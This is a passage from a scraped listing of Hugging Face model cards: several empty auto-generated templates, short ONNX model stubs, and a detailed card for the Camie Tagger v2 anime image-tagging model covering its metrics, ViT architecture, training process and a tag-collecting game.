] | null | 2025-09-23T14:46:37Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
LYGreen/my-catgirl-qwen3-2507-4b
|
LYGreen
| 2025-09-23T14:46:33Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen3",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T14:46:18Z |
---
base_model: unsloth/qwen3-4b-instruct-2507-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** LYGreen
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen3-4b-instruct-2507-unsloth-bnb-4bit
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
alpcaferoglu/Qwen2.5-Coder-3B-Instruct_bd_cs_t2sws-t2s_r64_a64_e1_bs2_gas4_lr7.5e-05_fs0f_cvdt_sftreason
|
alpcaferoglu
| 2025-09-23T14:46:06Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"unsloth",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T02:12:23Z |
---
library_name: transformers
tags:
- unsloth
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
onnxmodelzoo/resnext50d_32x4d_Opset17
|
onnxmodelzoo
| 2025-09-23T14:43:58Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:50Z |
---
language: en
license: apache-2.0
model_name: resnext50d_32x4d_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext50_32x4d_Opset18
|
onnxmodelzoo
| 2025-09-23T14:43:40Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:32Z |
---
language: en
license: apache-2.0
model_name: resnext50_32x4d_Opset18.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext50_32x4d_Opset16
|
onnxmodelzoo
| 2025-09-23T14:43:23Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:14Z |
---
language: en
license: apache-2.0
model_name: resnext50_32x4d_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext26ts_Opset18
|
onnxmodelzoo
| 2025-09-23T14:43:14Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:08Z |
---
language: en
license: apache-2.0
model_name: resnext26ts_Opset18.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext26ts_Opset17
|
onnxmodelzoo
| 2025-09-23T14:43:08Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:02Z |
---
language: en
license: apache-2.0
model_name: resnext26ts_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext101_32x8d_Opset17
|
onnxmodelzoo
| 2025-09-23T14:42:37Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:42:18Z |
---
language: en
license: apache-2.0
model_name: resnext101_32x8d_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext101_32x8d_Opset16
|
onnxmodelzoo
| 2025-09-23T14:42:18Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:41:58Z |
---
language: en
license: apache-2.0
model_name: resnext101_32x8d_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext101_32x4d_Opset16
|
onnxmodelzoo
| 2025-09-23T14:41:36Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:41:23Z |
---
language: en
license: apache-2.0
model_name: resnext101_32x4d_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50x1_bitm_Opset16
|
onnxmodelzoo
| 2025-09-23T14:41:09Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:40:56Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50x1_bitm_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50x1_bit_distilled_Opset17
|
onnxmodelzoo
| 2025-09-23T14:40:14Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:40:02Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50x1_bit_distilled_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50d_gn_Opset18
|
onnxmodelzoo
| 2025-09-23T14:39:47Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:39Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_gn_Opset18.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50d_gn_Opset17
|
onnxmodelzoo
| 2025-09-23T14:39:39Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:29Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_gn_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50d_gn_Opset16
|
onnxmodelzoo
| 2025-09-23T14:39:29Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:19Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_gn_Opset16.onnx
tags:
- Computer_Vision
---
|
mawiie/SmolLM3-3B-Base-Plain
|
mawiie
| 2025-09-23T14:39:28Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"sft",
"trl",
"base_model:HuggingFaceTB/SmolLM3-3B-Base",
"base_model:finetune:HuggingFaceTB/SmolLM3-3B-Base",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T13:04:35Z |
---
base_model: HuggingFaceTB/SmolLM3-3B-Base
library_name: transformers
model_name: SmolLM3-3B-Base-Plain
tags:
- generated_from_trainer
- sft
- trl
licence: license
---
# Model Card for SmolLM3-3B-Base-Plain
This model is a fine-tuned version of [HuggingFaceTB/SmolLM3-3B-Base](https://huggingface.co/HuggingFaceTB/SmolLM3-3B-Base).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="mawiie/SmolLM3-3B-Base-Plain", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
onnxmodelzoo/resnetv2_50d_evos_Opset17
|
onnxmodelzoo
| 2025-09-23T14:39:19Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:11Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_evos_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50_Opset17
|
onnxmodelzoo
| 2025-09-23T14:38:54Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:38:46Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50_Opset17.onnx
tags:
- Computer_Vision
---
|
Camais03/camie-tagger-v2
|
Camais03
| 2025-09-23T14:37:31Z | 336 | 16 | null |
[
"onnx",
"pytorch",
"danbooru",
"anime",
"multi-label",
"image-classification",
"en",
"dataset:p1atdev/danbooru-2024",
"arxiv:2010.11929",
"arxiv:2305.08069",
"license:gpl-3.0",
"region:us"
] |
image-classification
| 2025-08-31T19:22:55Z |
---
license: gpl-3.0
datasets:
- p1atdev/danbooru-2024
language:
- en
pipeline_tag: image-classification
tags:
- danbooru
- anime
- multi-label
---
# Camie Tagger v2
An advanced deep learning model for automatically tagging anime/manga illustrations with relevant tags across multiple categories, achieving an amazing **67.3% micro F1 score** (using the micro-optimized threshold profile) and **50.6% macro F1 score** (using the macro-optimized threshold preset) across **70,527 possible tags** on a test set of 20,116 samples. Now with a Vision Transformer backbone and significantly improved performance. This dataset is notoriously long-tailed and sparse.

## 🚀 What's New in v2


### Major Performance Improvements:
- **Micro F1**: 58.1% → **67.3%** (+9.2 percentage points)
- **Macro F1**: 33.8% → **50.6%** (+16.8 percentage points)
- **Model Size**: 424M → **143M parameters** (-66% reduction)
- **Architecture**: Switched from EfficientNetV2-L to Vision Transformer (ViT) backbone
- **Simplified Design**: Streamlined from dual-stage to single refined prediction model
### Training Innovations:
- **Multi-Resolution Training**: Progressive scaling from 384px → 512px resolution
- **IRFS (Instance-Aware Repeat Factor Sampling)**: Significant macro F1 improvements for rare tags
- **Adaptive Training**: Models quickly adapt to resolution/distribution changes after initial pretraining
- **Overall, the model is more accurate, faster, and built with less code!**
## ✨ Features:
- **Streamlit web interface app and game**: User-friendly UI for uploading and analyzing images and a tag collection game
- **Adjustable threshold profiles**: Micro, Macro, Balanced, and Category-specific profiles
- **Fine-grained control**: Per-category threshold adjustments for precision-recall tradeoffs
- **Safetensors and ONNX**: Available in main directory
## 📊 Performance Analysis:
### Complete v1 vs v2 Performance Comparison:
| CATEGORY | v1 Micro F1 | v2 Micro F1 | Micro Δ | v1 Macro F1 | v2 Macro F1 | Macro Δ |
|----------|-------------|-------------|---------|-------------|-------------|---------|
| **Overall** | 61.3% | **67.3%** | **+6.0pp** | 33.8% | **50.6%** | **+16.8pp** |
| **Artist** | 48.0% | **70.0%** | **+22.0pp** | 29.9% | **66.1%** | **+36.2pp** |
| **Character** | 75.7% | **83.4%** | **+7.7pp** | 52.4% | **66.2%** | **+13.8pp** |
| **Copyright** | 79.2% | **86.6%** | **+7.4pp** | 41.9% | **56.2%** | **+14.3pp** |
| **General** | 60.8% | **66.4%** | **+5.6pp** | 21.5% | **34.6%** | **+13.1pp** |
| **Meta** | 60.2% | **61.2%** | **+1.0pp** | 14.5% | **23.7%** | **+9.2pp** |
| **Rating** | 80.8% | **83.1%** | **+2.3pp** | 79.5% | **77.5%** | **-2.0pp** |
| **Year** | 33.2% | **30.8%** | **-2.4pp** | 29.3% | **32.6%** | **+3.3pp** |
*Micro F1 comparison using micro-optimized thresholds, Macro F1 comparison using macro-optimized thresholds for fair evaluation.*
### Key Performance Insights:
The v2 model shows remarkable improvements across nearly all categories:
- **Artist Recognition**: Massive +22.0pp micro F1 improvement and +36.2pp macro improvement, indicating much better artist identification
- **Character Detection**: Large +7.7pp micro F1 and +13.8pp macro F1 gains
- **Copyright Recognition**: Excellent +7.4pp micro F1 improvement and +14.3pp macro improvement for series identification
- **General Tags**: Improved +5.6pp micro F1 and +13.1pp macro F1 for visual attributes
- **Overall Macro F1**: Exceptional +16.8pp improvement shows much better rare tag recognition
Only the year category shows slight regression.
### Detailed v2 Performance:
#### MACRO OPTIMIZED (Recommended):
| CATEGORY | THRESHOLD | MICRO-F1 | MACRO-F1 |
|----------|-----------|----------|----------|
| **overall** | 0.492 | **60.9%** | **50.6%** |
| artist | 0.492 | 62.3% | 66.1% |
| character | 0.492 | 79.9% | 66.2% |
| copyright | 0.492 | 81.8% | 56.2% |
| general | 0.492 | 60.2% | 34.6% |
| meta | 0.492 | 56.3% | 23.7% |
| rating | 0.492 | 78.7% | 77.5% |
| year | 0.492 | 37.2% | 32.6% |
#### MICRO OPTIMIZED:
| CATEGORY | THRESHOLD | MICRO-F1 | MACRO-F1 |
|----------|-----------|----------|----------|
| **overall** | 0.614 | **67.3%** | **46.3%** |
| artist | 0.614 | 70.0% | 64.4% |
| character | 0.614 | 83.4% | 64.5% |
| copyright | 0.614 | 86.6% | 53.1% |
| general | 0.614 | 66.4% | 27.4% |
| meta | 0.614 | 61.2% | 19.2% |
| rating | 0.614 | 83.1% | 81.8% |
| year | 0.614 | 30.8% | 21.3% |
The model performs exceptionally well on character identification (83.4% F1 across 26,968 tags), copyright/series detection (86.6% F1 across 5,364 tags), and content rating classification (83.1% F1 across 4 tags).
### Real-world Tag Accuracy:
The macro optimized threshold is recommended as many "false positives" according to the benchmark are actually correct tags missing from the Danbooru dataset. The model frequently identifies appropriate tags that weren't included in the original tagging, making perceived accuracy higher than formal metrics suggest.
**If you'd like to support further training on the complete dataset or my future projects, consider supporting me here: https://ko-fi.com/camais. Your support will directly enable longer training runs and better models!**
## 🧠 Architecture Overview:
### Vision Transformer Backbone:
- **Base Model**: Vision Transformer (ViT) with patch-based image processing
- **Dual Output**: Patch feature map + CLS token for comprehensive image understanding
- **Efficient Design**: 86.4M backbone parameters vs previous 214M+ classifier layers
### Refined Prediction Pipeline:
1. **Feature Extraction**: ViT processes image into patch tokens and global CLS token
2. **Global Pooling**: Combines mean-pooled patches with CLS token (dual-pool approach)
3. **Initial Predictions**: Shared weights between tag embeddings and classification layer
4. **Candidate Selection**: Top-K tag selection based on initial confidence
5. **Cross-Attention**: Tag embeddings attend to image patch features
6. **Final Scoring**: Refined predictions for selected candidate tags
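The steps above translate naturally into a small PyTorch module. The following is only an illustrative sketch of that flow, not the released implementation: the dual-pool combination, embedding dimension, top-K value, and scoring head are all assumptions.
```python
import torch
import torch.nn as nn

class RefinedTagger(nn.Module):
    """Illustrative sketch of the refined prediction pipeline (hypothetical
    module; dimensions, top-k, and pooling details are assumptions)."""
    def __init__(self, backbone, num_tags=70527, dim=768, top_k=512):
        super().__init__()
        self.backbone = backbone                     # ViT returning (patch tokens, CLS token)
        self.tag_emb = nn.Embedding(num_tags, dim)   # shared with the initial classifier
        self.cross_attn = nn.MultiheadAttention(dim, num_heads=8, batch_first=True)
        self.score = nn.Linear(dim, 1)
        self.top_k = top_k

    def forward(self, images):
        patches, cls = self.backbone(images)         # (B, N, D), (B, D)
        pooled = (patches.mean(dim=1) + cls) / 2     # dual-pool global feature
        # Initial logits reuse the tag embedding matrix as classifier weights
        init_logits = pooled @ self.tag_emb.weight.T              # (B, num_tags)
        cand = init_logits.topk(self.top_k, dim=-1).indices       # candidate tag ids
        cand_emb = self.tag_emb(cand)                              # (B, K, D)
        # Candidate tag embeddings attend to image patch features
        refined, _ = self.cross_attn(cand_emb, patches, patches)
        refined_logits = self.score(refined).squeeze(-1)           # (B, K)
        return init_logits, cand, refined_logits
```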
### Key Improvements:
- **Shared Weights**: Tag embeddings directly used for initial classification
- **Simplified Pipeline**: Single refined prediction stage (vs previous initial + refined)
- **Native PyTorch**: Uses optimized MultiheadAttention instead of Flash Attention
- **Custom Embeddings**: No dependency on external models like CLIP
- **Gradient Checkpointing**: Memory-efficient training on consumer hardware
## 🛠️ Training Details:
### Multi-Resolution Training Strategy:
The model was trained using a multi-resolution approach:
1. **Phase 1**: 3 epochs at 384px resolution with learning rate 1e-4
2. **Phase 2**: IRFS (Instance-Aware Repeat Factor Sampling) - addresses long-tailed distribution imbalance
3. **Phase 3**: 512px resolution fine-tuning with learning rate 5e-5
### Key Training Insights:
**Rapid Adaptation**: Once the model learns good general features during initial pretraining, it adapts to resolution changes and distribution shifts very quickly - often within a fraction of an epoch rather than requiring full retraining.
**IRFS Benefits**: Instance-Aware Repeat Factor Sampling provided substantial macro F1 improvements by addressing the long-tailed distribution of anime tags, where instance counts vary dramatically between classes even with similar image counts.
**Efficient Scaling**: The ViT architecture generalizes resolution and capacity changes to the entire dataset, making incremental training highly efficient.
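To make the sampling idea concrete, here is a minimal repeat-factor sketch in the spirit of IRFS (a hypothetical helper, not the training code; the instance-aware weighting and the actual threshold value are not reproduced here):
```python
import math
from collections import Counter

def compute_repeat_factors(image_tags, threshold=1e-3):
    """Classic repeat-factor sampling: images containing rare tags get a
    repeat factor > 1 so they are oversampled within an epoch. IRFS further
    weights by per-class instance counts, which this sketch omits."""
    num_images = len(image_tags)
    tag_freq = Counter(t for tags in image_tags for t in set(tags))
    tag_rf = {t: max(1.0, math.sqrt(threshold / (c / num_images)))
              for t, c in tag_freq.items()}
    # Image-level factor is driven by its rarest tag
    return [max((tag_rf[t] for t in tags), default=1.0) for tags in image_tags]

# The resulting factors can feed a WeightedRandomSampler or explicit
# duplication of rare-tag images when building each training epoch.
```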
#### Training Data:
- **Training subset**: 2,000,000 images
- **Training duration**: 3+ epochs with multi-resolution scaling
- **Final resolution**: 512x512 pixels
## 🎮 Tag Collector Game (Camie Collector)
Introducing a tagging game: a gamified approach to anime image tagging that helps you understand the performance and limits of the model. This was a shower thought gone too far! Lots of Project Moon references.
### How to Play:
1. Upload an image
2. Scan for tags to discover them

3. Earn TagCoins for new discoveries
4. Spend TagCoins on upgrades to lower the threshold

5. Lower thresholds reveal rarer tags!
6. Collect sets of related tags for bonuses and reveal unique mosaics!

7. Visit the Library System to discover unique tags (not collect)

8. Use collected tags to either inspire new searches or generate essence
9. Use Enkephalin to generate Tag Essences

10. Use the Tag Essence Generator to collect the tag and the tags related to it. Lamp Essence:

## 🖥️ Web Interface Guide
The interface is divided into three main sections:
1. **Model Selection** (Sidebar):
- Choose between ONNX accelerated or safetensors model
- View model information and memory usage
2. **Image Upload** (Left Panel):
- Upload your own images or select from examples
- View the selected image
3. **Tagging Controls** (Right Panel):
- Select threshold profile
- Adjust thresholds for precision-recall and micro/macro tradeoff
- Configure display options
- View predictions organized by category
### Display Options:
- **Show all tags**: Display all tags including those below threshold
- **Compact view**: Hide progress bars for cleaner display
- **Minimum confidence**: Filter out low-confidence predictions
- **Category selection**: Choose which categories to include in the summary
### Interface Screenshots:

*Note the rare characters and tags identified. Some only have hundreds of samples on Danbooru!*

### 🛠️ Requirements
- **Python 3.11.9 specifically** (newer versions are incompatible)
- PyTorch 1.10+
- Streamlit
- PIL/Pillow
- NumPy
### 🔧 Usage
Set up the application and game by executing `setup.bat`, which installs the required virtual environment. Once running, the app lets you:
- Upload your own images or select from example images
- Choose different threshold profiles
- Adjust category-specific thresholds
- View predictions organized by category
- Filter and sort tags based on confidence
Launch them with `run_app.bat` and `run_game.bat`.
## 🧠 Training Details
### Dataset
The model was trained on a carefully filtered subset of the [Danbooru 2024 dataset](https://huggingface.co/datasets/p1atdev/danbooru-2024), which contains a vast collection of anime/manga illustrations with comprehensive tagging.
#### Filtering Process:
The dataset was filtered with the following constraints:
```python
# Minimum tags per category required for each image
min_tag_counts = {
'general': 25,
'character': 1,
'copyright': 1,
'artist': 0,
'meta': 0
}
# Minimum samples per tag required for tag to be included
min_tag_samples = {
'general': 20,
'character': 40,
'copyright': 50,
'artist': 200,
'meta': 50
}
```
This filtering process:
1. First removed low-sample tags (tags with fewer occurrences than specified in `min_tag_samples`)
2. Then removed images with insufficient tags per category (as specified in `min_tag_counts`)
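A minimal sketch of this two-pass filter is shown below (a hypothetical helper; the per-sample data layout `s["tags"]` is an assumption made for illustration, not the actual pipeline code):
```python
from collections import Counter

def filter_dataset(samples, min_tag_samples, min_tag_counts):
    """Pass 1 drops rare tags, pass 2 drops under-tagged images."""
    # Pass 1: remove tags with fewer occurrences than min_tag_samples
    freq = Counter((cat, t) for s in samples
                   for cat, tags in s["tags"].items() for t in tags)
    kept = {(cat, t) for (cat, t), c in freq.items()
            if c >= min_tag_samples.get(cat, 0)}
    for s in samples:
        s["tags"] = {cat: [t for t in tags if (cat, t) in kept]
                     for cat, tags in s["tags"].items()}
    # Pass 2: remove images with insufficient tags per category
    return [s for s in samples
            if all(len(s["tags"].get(cat, [])) >= n
                   for cat, n in min_tag_counts.items())]
```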
#### Training Data:
- **Starting dataset size**: ~3,000,000 filtered images
- **Training subset**: 2,000,000 images (due to storage and time constraints)
#### Preprocessing:
Images were preprocessed with minimal transformations:
- Tensor normalization (scaled to 0-1 range)
- ImageNet normalization.
- Resized while maintaining original aspect ratio
- No additional augmentations were applied
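A minimal sketch of this preprocessing follows (a hypothetical helper; only the 0-1 scaling, ImageNet normalization, and aspect-ratio-preserving resize are stated above, while the padding and interpolation choices are assumptions):
```python
import torch
from PIL import Image
from torchvision import transforms

IMAGENET_MEAN = (0.485, 0.456, 0.406)
IMAGENET_STD = (0.229, 0.224, 0.225)

def preprocess(img: Image.Image, target: int = 512) -> torch.Tensor:
    # Resize the longer side to `target` while keeping the aspect ratio,
    # then pad to a square canvas (padding choice is an assumption)
    w, h = img.size
    scale = target / max(w, h)
    img = img.resize((round(w * scale), round(h * scale)), Image.BICUBIC)
    canvas = Image.new("RGB", (target, target))
    canvas.paste(img, ((target - img.width) // 2, (target - img.height) // 2))
    to_tensor = transforms.Compose([
        transforms.ToTensor(),                              # scales to [0, 1]
        transforms.Normalize(IMAGENET_MEAN, IMAGENET_STD),  # ImageNet normalization
    ])
    return to_tensor(canvas)
```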
#### Tag Categories:
The model recognizes tags across these categories:
- **General**: Visual elements, concepts, clothing, etc. (30,841 tags)
- **Character**: Individual characters appearing in the image (26,968 tags)
- **Copyright**: Source material (anime, manga, game) (5,364 tags)
- **Artist**: Creator of the artwork (7,007 tags)
- **Meta**: Meta information about the image (323 tags)
- **Rating**: Content rating (4 tags)
- **Year**: Year of upload (20 tags)
All supported tags are stored in `model/metadata.json`, which maps tag IDs to their names and categories.
### Training Notebooks
The repository includes the main training notebook:
1. **camie-tagger-v2.ipynb**:
- Main training notebook
- Dataset loading and preprocessing
- Model initialization
- Tag selection optimization
- Metric tracking and visualization
### Training Monitor
The project includes a real-time training monitor accessible via browser at `localhost:5000` during training:
#### Performance Tips:
